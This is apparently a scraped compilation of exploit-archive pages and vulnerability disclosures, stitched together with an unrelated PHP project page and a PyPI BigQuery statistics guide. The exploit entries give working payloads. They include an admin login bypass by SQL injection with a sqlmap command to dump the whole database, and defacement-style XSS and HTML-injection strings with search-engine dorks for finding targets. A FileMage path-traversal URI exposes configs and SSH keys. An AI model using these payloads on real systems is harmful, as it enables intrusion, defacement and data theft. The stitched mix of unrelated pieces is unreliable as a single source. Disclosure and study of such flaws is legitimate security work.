User Registration and Login and User Management System version 3.0 suffers from a remote SQL injection vulnerability.

# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)# Google Dork: NA# Date: 19/08/2023# Exploit Author: Ashutosh Singh Umath# Vendor Homepage: https://phpgurukul.com# Software Link:https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.0# Tested on: Windows 11# CVE : RequestedProof Of Concept:1. Navigate to the admin login page.URL: http://192.168.1.5/loginsystem/admin/2. Enter "*admin' -- -*" in the admin username field and anythingrandom in the password field.3. Now you successfully logged in as admin.4. To download all the data from the database, use the below commands. 4.1. Login to the admin portal and capture the request. 4.2. Copy the intercepted request in a file. 4.3. Now use the below command to dump all the dataCommand: sqlmap -r <file-name> -p username -D loginsystem --dump-allThanks and Regards,Ashutosh Singh Umath

User Registration And Login And User Management System 3.0 SQL Injection

Cross Site Scripting (XSS) vulnerability in sourcecodester Student Study Center Desk Management System 1.0 allows attackers to run arbitrary code via crafted GET request to web application URL.

Submitted by oretnom23 on Tuesday, March 14, 2023 - 15:32.

This project is entitled **Student Study Center Desk Management System**. It is a web-based application that was mainly developed using **PHP Language** and **MySQL Database**. The project's main purpose is to provide certain study center with a platform for managing the students' assigned or allocated desks. It has a pleasant user interface using **Bootstrap Framework** and **AdminLTE Template**. The project also contains multiple user-friendly features and functionalities.

****How does the Student Study Center Desk Management System?****

The Student Study Center Desk Management System is a project with one module which is the management site only that can be accessed by Administrator or Staff users. Here, the study center management can simply allocate or assign and unassign students to specific desks. The management is required to populate the list of students and list of the desk upon using the system for the first time. To manage the student desk allocation, management can simply redirect to the **"Assign"** page and select the student's name. Then, they can simply assign the student to a certain desk and manage the list of the history of the assigned records. This system also contains date-wise reports.

****What are the Features and Functionalities?****

The Student Study Center Desk Management System contains the following features and functionalities:

*   **Login and Logout**
*   **Dashboard Page**
*   **Student List Management**
*   **Desk List Management**
*   **Manage Student Desk Allocation**
*   **Generate Date-wise Reports**
*   **Manage System Users**
*   **Manage System Information**
*   **Update Account Details**

****What are the Technologies used?****

Here are the technologies that I used to develop this **Student Study Center Desk Management System**:

*   **XAMPP**
*   **VS Code Editor**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Ajax**
*   **DataTables Library**
*   **Select2 Library**
*   **Bootstrap Framework**
*   **AdminLTE Template**
*   **Fontawesome Icons**

****Snapshots********Dashboard****

****Student List****

****Desk List****

****Student Assign/Unassigned Records****

****Reports****

The **Students Study Center Desk Management System** project source code zip file is provided on this website and it is free to download. The project was mainly developed for educational purposes only. Feel free to download and modify the project source code to meet your own requirements.

****How to Run?****

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
6.  **Create** a **new database** named ****sscdms\_db****.
7.  **Import** the provided ****SQL**** file. The file is known as ****sscdms\_db.sql**** located inside the **database** folder.
8.  **Browse** the **Student Study Center Desk Management System** in a **browser**. i.e. ****http://localhost/php-sscdms/****.

****Default Admin Access****

Username: **admin**  
Password: **admin123**

****DEMO VIDEO****

That's it! I hope this **Student Study Center Desk Management System using PHP (OOP) and MySQL DB Free Source Code Project** will help you with what you are looking for and that you'll find something useful for your current and future PHP Projects.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy =)****

*   4512 views

CVE-2023-36317: Student Study Center Desk Management System using PHP (OOP) and MySQL DB Free Source Code

SugarCRM versions 12.2.0 and below suffer from multiple remote SQL injection vulnerabilities.

---------------------------------------------------- 
SugarCRM <= 12.2.0 Two SQL Injection Vulnerabilities 
----------------------------------------------------

[-] Software Link:

https://www.sugarcrm.com

[-] Affected Versions:

Version 12.2.0 and prior versions. 
Version 12.0.2 and prior versions. 
Version 11.0.5 and prior versions.

[-] Vulnerabilities Description:

1) User input passed through the “metrics” parameter to the 
“/Forecasts/metrics” 
REST API endpoint is not properly sanitized before being used to 
construct a SQL 
query. This can be exploited by malicious users to e.g. read sensitive 
data from 
the database through in-band SQL Injection attacks.

2) User input passed through the “placeholder_fields” parameter to the 
e.g. 
“/Notes/{recordID}/link/history” REST API endpoint is not properly 
sanitized before 
being used to construct a SQL query. This can be exploited by malicious 
users to 
e.g. read sensitive data from the database through in-band SQL Injection 
attacks.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2023-35811_1.php 
https://karmainsecurity.com/pocs/CVE-2023-35811_2.php

[-] Solution:

Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.

[-] Disclosure Timeline:

[14/02/2023] - Vendor notified 
[12/04/2023] - Fixed versions released 
[17/06/2023] - CVE number assigned 
[23/08/2023] - Publication of this advisory

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) 
has assigned the name CVE-2023-35811 to these vulnerabilities.

[-] Credits:

Vulnerabilities discovered by Egidio Romano.

[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-08

[-] Other References:

https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-008/

SugarCRM 12.2.0 SQL Injection

GEN Security+ version 4.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : GEN Security+ v4.0 Sql Injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ptcpay.com/                                                                                            || # Dork      : Powered by GeN4 Security+ 2.0                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/GEN/forum/main_forum.php?cat=1 (inject her)[+] login : http://127.0.0.1/GEN/admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

GEN Security+ 4.0 SQL Injection

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

**G And G Corporate CMS 1.0 Cross Site Scripting**

Posted Aug 23, 2023

Authored by indoushka

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ec7e6459653c2e6f1683c120c47e58e61d870a911a466497ef2ef99455a30669

Download | Favorite | View

**G And G Corporate CMS 1.0 Cross Site Scripting**

 ====================================================================================================================================| # Title : G&G Corporate CMS v1.0 XSS Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | | # Vendor : http://gegweb.it | | # Dork : intext:Powered by Studio G&G Corporate Communication site:it |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee>Hacked by indoushka</marquee>[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

* ActiveX (932)
* Advisory (82,006)
* Arbitrary (16,212)
* BBS (2,859)
* Bypass (1,740)
* CGI (1,026)
* Code Execution (7,282)
* Conference (679)
* Cracker (841)
* CSRF (3,347)
* DoS (23,453)
* Encryption (2,370)
* Exploit (51,952)
* File Inclusion (4,222)
* File Upload (976)
* Firewall (821)
* Info Disclosure (2,785)
* Intrusion Detection (892)
* Java (3,045)
* JavaScript (859)
* Kernel (6,681)
* Local (14,456)
* Magazine (586)
* Overflow (12,693)
* Perl (1,423)
* PHP (5,147)
* Proof of Concept (2,338)
* Protocol (3,602)
* Python (1,535)
* Remote (30,799)
* Root (3,587)
* Rootkit (508)
* Ruby (612)
* Scanner (1,640)
* Security Tool (7,888)
* Shell (3,186)
* Shellcode (1,215)
* Sniffer (894)
* Spoof (2,207)
* SQL Injection (16,383)
* TCP (2,406)
* Trojan (687)
* UDP (893)
* Virus (665)
* Vulnerability (31,788)
* Web (9,670)
* Whitepaper (3,750)
* x86 (962)
* XSS (17,953)
* Other

**File Archives**

* August 2023
* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* Older

**Systems**

* AIX (428)
* Apple (2,002)
* BSD (373)
* CentOS (57)
* Cisco (1,925)
* Debian (6,819)
* Fedora (1,692)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (351)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,504)
* Mac OS X (686)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (485)
* RedHat (13,750)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,835)
* UNIX (9,291)
* UnixWare (186)
* Windows (6,574)
* Other

G And G Corporate CMS 1.0 Cross Site Scripting

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

**FreshRSS 1.11.1 HTML Injection**

Posted Aug 23, 2023

Authored by indoushka

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

tags | exploit

SHA-256 | c789b4001ff7c396e22af1e82b8f9c8c3a4f13f593828eb66d0a73226d79294b

Download | Favorite | View

**FreshRSS 1.11.1 HTML Injection**

 ====================================================================================================================================| # Title : FreshRSS v1.11.1 Html Inject Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) || # Vendor : https://freshrss.org/ |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : <marquee>Hacked by indoushka</marquee>[+] https://demo127.0.0.1/freshrssorg/i/?c=<marquee>Hacked by indoushka</marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |=======================================================================================================================================

**File Tags**

* ActiveX (932)
* Advisory (82,006)
* Arbitrary (16,212)
* BBS (2,859)
* Bypass (1,740)
* CGI (1,026)
* Code Execution (7,282)
* Conference (679)
* Cracker (841)
* CSRF (3,347)
* DoS (23,453)
* Encryption (2,370)
* Exploit (51,952)
* File Inclusion (4,222)
* File Upload (976)
* Firewall (821)
* Info Disclosure (2,785)
* Intrusion Detection (892)
* Java (3,045)
* JavaScript (859)
* Kernel (6,681)
* Local (14,456)
* Magazine (586)
* Overflow (12,693)
* Perl (1,423)
* PHP (5,147)
* Proof of Concept (2,338)
* Protocol (3,602)
* Python (1,535)
* Remote (30,799)
* Root (3,587)
* Rootkit (508)
* Ruby (612)
* Scanner (1,640)
* Security Tool (7,888)
* Shell (3,186)
* Shellcode (1,215)
* Sniffer (894)
* Spoof (2,207)
* SQL Injection (16,383)
* TCP (2,406)
* Trojan (687)
* UDP (893)
* Virus (665)
* Vulnerability (31,788)
* Web (9,670)
* Whitepaper (3,750)
* x86 (962)
* XSS (17,953)
* Other

**File Archives**

* August 2023
* July 2023
* June 2023
* May 2023
* April 2023
* March 2023
* February 2023
* January 2023
* December 2022
* November 2022
* October 2022
* September 2022
* Older

**Systems**

* AIX (428)
* Apple (2,002)
* BSD (373)
* CentOS (57)
* Cisco (1,925)
* Debian (6,819)
* Fedora (1,692)
* FreeBSD (1,244)
* Gentoo (4,322)
* HPUX (879)
* iOS (351)
* iPhone (108)
* IRIX (220)
* Juniper (67)
* Linux (46,504)
* Mac OS X (686)
* Mandriva (3,105)
* NetBSD (256)
* OpenBSD (485)
* RedHat (13,750)
* Slackware (941)
* Solaris (1,610)
* SUSE (1,444)
* Ubuntu (8,835)
* UNIX (9,291)
* UnixWare (186)
* Windows (6,574)
* Other

FreshRSS 1.11.1 HTML Injection

Developers are not the only people who have adopted the agile methodology for their development processes. From 2023-06-15 to 2023-07-11, Permiso Security’s p0 Labs team identified and tracked an attacker developing and deploying eight (8) incremental iterations of their credential harvesting malware while continuing to develop infrastructure for an upcoming (spoiler: now launched) campaign

Agile Approach to Mass Cloud Credential Harvesting and Crypto Mining Sprints Ahead

Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.

**Overview**

Hello all! Long time no see, I recently identified a vulnerability on FileMage Gateway that I applied for my first CVE.

On a recent security assesment, I identified a security vulnerability in FileMage Gateway. It is possible to send an unauthenticated HTTP(s) GET request to retrieve arbitrary files on the host system. This vulnerability is present and identified on the Azure Marketplace product.

**What is Filemage**

FileMage Gateway is an FTP/SFTP server backed by a cloud object storage API. Deployable from your cloud provider marketplace and billed hourly.

**Technical Details**

This section outlines the steps to replicate the exploitation of the identified vulnerability. I deployed an Azure Virtual Machine from the marketplace for the technical analysis. Additional reference material may be requested if needed.

By navigating to the homepage on FileMage Gateway, a path traversal vulnerability is present under the /mgmnt/ directory on the Azure Marketplace Deployment. An unauthenticated HTTPS GET request can be sent using dot-dot slash sequences using URL encoding as observed below.

    URI: /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5 cwindows%5cwin.ini
    

Deploying a test instance from the Azure Marketplace, process monitoring was leveraged to understand where the sensitive and configuration files are stored in FileMage.

It’s possible for an unauthenticated user to extract sensitive data such as FileMage and PostgresSQL configuration files, SSH keys, and other sensitive files as illustrated in the screenshots below.

This vulnerability was tested on non-azure deployments of FileMage but were found not to be vulnerable to the path traversal. I disclosed this vulnerability with the help of a great friend “Tylous”, thanks! This has since been patched.

**Recommendation**

User-controllable data should be strictly validated before being passed to any filesystem operations. In particular, input containing dot-dot sequences should be blocked. This was disclosed to the vendor

**Patched**

https://www.filemage.io/docs/updates.html - This was updated in 1.10.9 version of FileMage

**Next Steps**

While waiting on the CVE # to publish, I’ll publish the python POC code to exploit this and a nuclei template that I will try to merge with the nuclei-templates repo.

CVE-2023-39026: FileMage Gateway LFI

An issue was discovered in PostgreSQL 12.2 allows attackers to cause a denial of service via repeatedly sending SIGHUP signals.

CVE-2020-21469: Buffer overflow when continuously send SIGHUP to postgres

The json2xml package through 3.12.0 for Python allows an error in typecode decoding enabling a remote attack that can lead to an exception, causing a denial of service.

This section covers how to use the public PyPI download statistics dataset to learn more about downloads of a package (or packages) hosted on PyPI. For example, you can use it to discover the distribution of Python versions used to download a package.

Contents

*   Background
    
*   Public dataset
    
    *   Getting set up
        
    *   Data schema
        
    *   Useful queries
        
        *   Counting package downloads
            
        *   Package downloads over time
            
        *   Python versions over time
            
        *   Getting absolute links to artifacts
            
*   Caveats
    
*   Additional tools
    
    *   google-cloud-bigquery
        
    *   pypinfo
        
    *   pandas-gbq
        
*   References
    

**Background¶**

PyPI does not display download statistics for a number of reasons: 1

*   **Inefficient to make work with a Content Distribution Network (CDN):** Download statistics change constantly. Including them in project pages, which are heavily cached, would require invalidating the cache more often, and reduce the overall effectiveness of the cache.
    
*   **Highly inaccurate:** A number of things prevent the download counts from being accurate, some of which include:
    
    *   pip’s download cache (lowers download counts)
        
    *   Internal or unofficial mirrors (can both raise or lower download counts)
        
    *   Packages not hosted on PyPI (for comparisons sake)
        
    *   Unofficial scripts or attempts at download count inflation (raises download counts)
        
    *   Known historical data quality issues (lowers download counts)
        
*   **Not particularly useful:** Just because a project has been downloaded a lot doesn’t mean it’s good; Similarly just because a project hasn’t been downloaded a lot doesn’t mean it’s bad!
    

In short, because it’s value is low for various reasons, and the tradeoffs required to make it work are high, it has been not an effective use of limited resources.

**Public dataset¶**

As an alternative, the Linehaul project streams download logs from PyPI to Google BigQuery 2, where they are stored as a public dataset.

**Getting set up¶**

In order to use Google BigQuery to query the public PyPI download statistics dataset, you’ll need a Google account and to enable the BigQuery API on a Google Cloud Platform project. You can run up to 1TB of queries per month using the BigQuery free tier without a credit card

*   Navigate to the BigQuery web UI.
    
*   Create a new project.
    
*   Enable the BigQuery API.
    

For more detailed instructions on how to get started with BigQuery, check out the BigQuery quickstart guide.

**Data schema¶**

Linehaul writes an entry in a bigquery-public-data.pypi.file_downloads table for each download. The table contains information about what file was downloaded and how it was downloaded. Some useful columns from the table schema include:

  

Column

Description

Examples

timestamp

Date and time

2020-03-09 00:33:03 UTC

file.project

Project name

pipenv, nose

file.version

Package version

0.1.6, 1.4.2

details.installer.name

Installer

pip, bandersnatch

details.python

Python version

2.7.12, 3.6.4

**Useful queries¶**

Run queries in the BigQuery web UI by clicking the “Compose query” button.

Note that the rows are stored in a partitioned table, which helps limit the cost of queries. These example queries analyze downloads from recent history by filtering on the timestamp column.

**Counting package downloads¶**

The following query counts the total number of downloads for the project “pytest”.

#standardSQL
SELECT COUNT(\*) AS num\_downloads
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE file.project = 'pytest'
  -- Only query the last 30 days of history
  AND DATE(timestamp)
    BETWEEN DATE\_SUB(CURRENT\_DATE(), INTERVAL 30 DAY)
    AND CURRENT\_DATE()

num\_downloads

26190085

To count downloads from pip only, filter on the details.installer.name column.

#standardSQL
SELECT COUNT(\*) AS num\_downloads
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE file.project = 'pytest'
  AND details.installer.name = 'pip'
  -- Only query the last 30 days of history
  AND DATE(timestamp)
    BETWEEN DATE\_SUB(CURRENT\_DATE(), INTERVAL 30 DAY)
    AND CURRENT\_DATE()

num\_downloads

24334215

**Package downloads over time¶**

To group by monthly downloads, use the TIMESTAMP_TRUNC function. Also filtering by this column reduces corresponding costs.

#standardSQL
SELECT
  COUNT(\*) AS num\_downloads,
  DATE\_TRUNC(DATE(timestamp), MONTH) AS \`month\`
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE
  file.project = 'pytest'
  -- Only query the last 6 months of history
  AND DATE(timestamp)
    BETWEEN DATE\_TRUNC(DATE\_SUB(CURRENT\_DATE(), INTERVAL 6 MONTH), MONTH)
    AND CURRENT\_DATE()
GROUP BY \`month\`
ORDER BY \`month\` DESC

 

num\_downloads

month

1956741

2018-01-01

2344692

2017-12-01

1730398

2017-11-01

2047310

2017-10-01

1744443

2017-09-01

1916952

2017-08-01

**Python versions over time¶**

Extract the Python version from the details.python column. Warning: This query processes over 500 GB of data.

#standardSQL
SELECT
  REGEXP\_EXTRACT(details.python, r"\[0-9\]+\\.\[0-9\]+") AS python\_version,
  COUNT(\*) AS num\_downloads,
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE
  -- Only query the last 6 months of history
  DATE(timestamp)
    BETWEEN DATE\_TRUNC(DATE\_SUB(CURRENT\_DATE(), INTERVAL 6 MONTH), MONTH)
    AND CURRENT\_DATE()
GROUP BY \`python\_version\`
ORDER BY \`num\_downloads\` DESC

 

python

num\_downloads

3.7

18051328726

3.6

9635067203

3.8

7781904681

2.7

6381252241

null

2026630299

3.5

1894153540

**Getting absolute links to artifacts¶**

It’s sometimes helpful to be able to get the absolute links to download artifacts from PyPI based on their hashes, e.g. if a particular project or release has been deleted from PyPI. The metadata table includes the path column, which includes the hash and artifact filename.

Note

The URL generated here is not guaranteed to be stable, but currently aligns with the URL where PyPI artifacts are hosted.

SELECT
  CONCAT('https://files.pythonhosted.org/packages', path) as url
FROM
  \`bigquery-public-data.pypi.distribution\_metadata\`
WHERE
  filename LIKE 'sampleproject%'

url

https://files.pythonhosted.org/packages/eb/45/79be82bdeafcecb9dca474cad4003e32ef8e4a0dec6abbd4145ccb02abe1/sampleproject-1.2.0.tar.gz

https://files.pythonhosted.org/packages/56/0a/178e8bbb585ec5b13af42dae48b1d7425d6575b3ff9b02e5ec475e38e1d6/sampleproject\_nomura-1.2.0-py2.py3-none-any.whl

https://files.pythonhosted.org/packages/63/88/3200eeaf22571f18d2c41e288862502e33365ccbdc12b892db23f51f8e70/sampleproject\_nomura-1.2.0.tar.gz

https://files.pythonhosted.org/packages/21/e9/2743311822e71c0756394b6c5ab15cb64ca66c78c6c6a5cd872c9ed33154/sampleproject\_doubleyoung18-1.3.0-py2.py3-none-any.whl

https://files.pythonhosted.org/packages/6f/5b/2f3fe94e1c02816fe23c7ceee5292fb186912929e1972eee7fb729fa27af/sampleproject-1.3.1.tar.gz

**Caveats¶**

In addition to the caveats listed in the background above, Linehaul suffered from a bug which caused it to significantly under-report download statistics prior to July 26, 2018. Downloads before this date are proportionally accurate (e.g. the percentage of Python 2 vs. Python 3 downloads) but total numbers are lower than actual by an order of magnitude.

**Additional tools¶**

Besides using the BigQuery console, there are some additional tools which may be useful when analyzing download statistics.

**google-cloud-bigquery¶**

You can also access the public PyPI download statistics dataset programmatically via the BigQuery API and the google-cloud-bigquery project, the official Python client library for BigQuery.

from google.cloud import bigquery

\# Note: depending on where this code is being run, you may require
\# additional authentication. See:
\# https://cloud.google.com/bigquery/docs/authentication/
client \= bigquery.Client()

query\_job \= client.query("""
SELECT COUNT(\*) AS num\_downloads
FROM \`bigquery-public-data.pypi.file\_downloads\`
WHERE file.project = 'pytest'
  -- Only query the last 30 days of history
  AND DATE(timestamp)
    BETWEEN DATE\_SUB(CURRENT\_DATE(), INTERVAL 30 DAY)
    AND CURRENT\_DATE()""")

results \= query\_job.result()  \# Waits for job to complete.
for row in results:
    print("{} downloads".format(row.num\_downloads))

**pypinfo¶**

pypinfo is a command-line tool which provides access to the dataset and can generate several useful queries. For example, you can query the total number of download for a package with the command pypinfo package_name.

Install pypinfo using pip.

python3 \-m pip install pypinfo

Usage:

$ pypinfo requests
Served from cache: False
Data processed: 6.87 GiB
Data billed: 6.87 GiB
Estimated cost: $0.04

| download\_count |
| -------------- |
|      9,316,415 |

**pandas-gbq¶**

The pandas-gbq project allows for accessing query results via Pandas.

**References¶**

1

PyPI Download Counts deprecation email

2

PyPI BigQuery dataset announcement email

Tag

#sql